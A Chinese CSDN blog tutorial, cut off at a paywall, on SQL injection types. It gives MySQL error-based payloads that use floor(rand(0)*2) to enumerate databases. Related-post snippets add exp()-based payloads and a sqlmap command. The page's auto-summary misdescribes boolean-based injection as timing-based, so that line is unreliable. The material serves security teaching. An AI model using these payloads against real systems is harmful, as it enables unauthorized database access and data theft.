sql注入-error、boolean、time-based and 宽字节

最新推荐文章于 2024-07-09 10:00:27 发布
最新推荐文章于 2024-07-09 10:00:27 发布
阅读量1.8k 收藏 1
点赞数 2
分类专栏: 网络安全 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37133717/article/details/93512866
版权
本文详细介绍了SQL注入的三种主要类型:Error-based、Boolean-based和Time-based Blind SQL注入,包括利用前提、示例和各自的优缺点。Error-based注入依赖于错误信息的输出,Boolean-based注入则通过页面响应时间变化来探测,而Time-based注入则通过延时操作进行判断。此外,还提到了宽字节注入问题和如何防止。
摘要由CSDN通过智能技术生成

1、Error-based SQL injection

利用前提:

页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysqli_error()

优点:
不需要显示位
缺点:
需要输出mysqli_error( )的报错信息

  • 通过floor报错

    select 列1(count()) , 列2(concat()随机数) as x from 表 group by x;
    select count(    ),concat(database(),floor(rand(0)*2)) as x from users group by x
    select * from users where id = 1 and (select 345 from (表) as b )

  • 获取有多少个数据库

    and (select 1 from(select count(*),concat((select (select (select
    concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from
    information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
    group by x)a)

  • 通过limit 获取所有数据库名

    and (select 1 from(select count(*),concat((select (select (select concat(0x7e,
    schema_name, 0x7e) from informat

最低0.47元/天 解锁文章
刘三羊
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs之Error Based Exploitation小结
极光时流
11-12 637
sqli-labs之Error Based Exploitation小结 Less-1 Lesson 1 id=1’ -->’ ‘1’’ LIMIT 0,1 ’ id=1’’ --> right id=1\ -->’ 1’ LIMIT 0,1 ’ id=1’order by 3 --> ’
1、SQL注入语句之Mysql(3)Error Based
daxi0ng的博客
08-05 814
1.exp()MySQL>=5.5.5 select * from products where pid=1 and exp(~(select * from(select user())a)); 1 and exp(~(select*from(select convert(concat(database(),0x7c,user(),0x7c,version())using lati...
SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
xiaoganbuaiuk的博客
07-09 1765
SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。
SQL注入:MySQL注入天书(1-4) Error Based
无名J0kзr的博客
01-29 1497
文章目录注入流程 注入流程 输入一个参数id,返回两个参数,说明SELECT的至少有username和password两个字段,存放这两个字段的表至少有三个字段id, username, password 单引号判断在id处有注入点 使用ORDER BY判断出表中有3个字段 使用UNION确定到底SELECT了几个字段 首先用一个非法的id值-1,这样根据id选出来的字段值为空,可显示出...
sqli-labs练习(二)----------GET-Error based-ingiter based
wkend的博客
04-15 356
这一节是数字型注入, sql查询语句源码$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 可以看到,$id并没有用单引号括起来,在sql语句中,对于数字型是数据可以不加单引号,不用考虑单引号的闭合以及注释问题。 输入1,查看结果 输入1',查看结果 由此可以判定,这是属于数字型sql注入。 所以,这里和上一节的区别就是不加单引...
SQL Injection - Blind - Boolean-Based注入思路
****的博客
08-21 3716
靶机:bWAPP bug:SQL Injection - Blind - Boolean-Based 难度等级:low 这是基于布尔型的盲注。首先使用“Man of Steel”、“Man of Steel' and 1=1#”测试发现,返回的信息都为“The movie exists in our database!”,当输入“Man of Steel' and 1=2#”,返回 “The...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3071
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sql注入详解
m0_73109590的博客
08-03 999
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
sql注入知识点
m0_55772907的博客
04-27 3668
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
Error-based
weixin_33882443的博客
07-13 382
1.将聚合函数count()和group by语句联合起来迫使sql查询语句返回错误(主键重复)   须知:     floor:函数只返回整数部分,小数部分舍弃。     round:函数四舍五入,大于0.5的部分进位,不到则舍弃。     floor(rand(0)*2)前面产生的随机数是确定的011011...     1>mysql在遇到select count(*) f...
深层error-base的sql注入攻击
09-05
error-base的sql注入,一片外国文档
Python:SQLMap源码精读—基于错误的盲注(error-based blind)
weixin_34152820的博客
07-28 207
目标网址 http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 Payload的生成 1 <test> 2 <title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title> 3 <...
union注入 (Error based)
soldi_er的博客
02-28 342
文章目录探测漏洞利用漏洞基础补充 探测漏洞 GET参数id 重点在于系统是否执行了我们输入的语句 单引号:?id=1’ 逻辑:对比两个页面 ?id=1 and 1=1和?id=1 and 1=2(数字型注入) ?id=1’ and ‘1’=‘1和?id=1’ and ‘1’='2(字符型注入) 加减:对比两个页面 ?id=2-1和?id=1 利用漏洞 基础   联合注入条件:有回显位。知道字段数。   联合注入语句: 查字段:?id=1’ order by x#(查询有结果才能排序) 联合:?id=0’
SQL注入布尔盲注
qq_43936524的博客
02-16 911
记录一下日常发现的SQL注入漏洞,方便以后拓思路。 漏洞发现 漏洞的位置在某公司的解决方案模块页面,注入的参数为type,请求方式为get 经过测试发现当type的值为1或者有效数值时页面会正常显示,当数值为type=1 and 1=9时页面出现错误 可推断出and 1 = 9被执行,此次存在SQL布尔盲注漏洞 打开sqlmap选择注入方式为布尔盲注,跑出当前的数据库名 python sqlmap.py -u https://xxx/xx.php?type=1 -v 3 --technique=B --
sql-base on time 的盲注案例演示
qq_42764906的博客
04-07 167
输入 没有暂停5S 输入(把a换成p) 有5S延迟 证明第一个字母是P
SQL渗透与防御——(四)基于报错注入
FisrtBqy的博客
03-06 492
第四章 基于报错注入 1.User-Agent注入 修改消息头的User-Agent参数 单引号报错判断 推测语句 其源码有可能是insert into tablename value(1,2) 那么就要闭合value()中的右括号a',(select database())) # [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 2.Stacked queries堆叠注入 #可以执行多条SQL语句 select * from user;select * from u
Xray捡洞中的高频漏洞
热门推荐
m0_49936858的博客
08-12 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危。
xray Web扫描器学习记录
weixin_50464560的博客
06-06 4151
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值